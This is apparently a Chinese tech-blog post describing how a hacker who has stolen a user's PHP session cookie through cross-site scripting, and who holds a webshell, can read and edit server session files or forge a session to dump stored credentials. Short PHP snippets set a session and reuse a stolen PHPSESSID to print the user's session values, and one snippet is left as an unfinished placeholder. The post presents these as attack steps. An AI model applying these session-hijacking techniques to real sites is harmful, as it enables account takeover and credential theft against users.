关于跨站技术的高级简单利用

本文详细介绍了黑客如何通过跨站攻击获取用户session cookie,并利用此cookie进行恶意操作,包括直接修改session文件和伪造session以获取用户凭据。文章提供了具体的PHP代码示例,展示了session工作原理及攻击过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这里只丢2个代码,用于思路性测试,测试结果也欧克

set.php用于模拟正常设置session(一般就是目标用户正常登陆系统后)

<?php
session_start();
$_SESSION['user']='admin';
$_SESSION['pass']='xtj';
?>

作为黑客,通过跨站拿到以上用户的cookie以后且拿到了webshell可以采取以下措施。


1.一般php的session都写入了临时文件夹(php.ini中有定义以及常量),webshell一般都有读权限,可以直接查看该文件并修改实现修改session变量。

文件名为:sess_eb0ae244711af9259ec247182c828da3,内容为:user|s:5:"admin";pass|s:3:"xtj";,也可以伪造。

<?
//补充ing
?>


2.用户黑客直接伪造session获得对应用户的session凭据:

<?php
session_start();
setcookie('PHPSESSID','eb0ae244711af9259ec247182c828da3');//这里需要先通过跨站代码得到session内容。
foreach($_SESSION as $k=>$v)
{
	echo "$k is $v<br>";
}
?>


评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值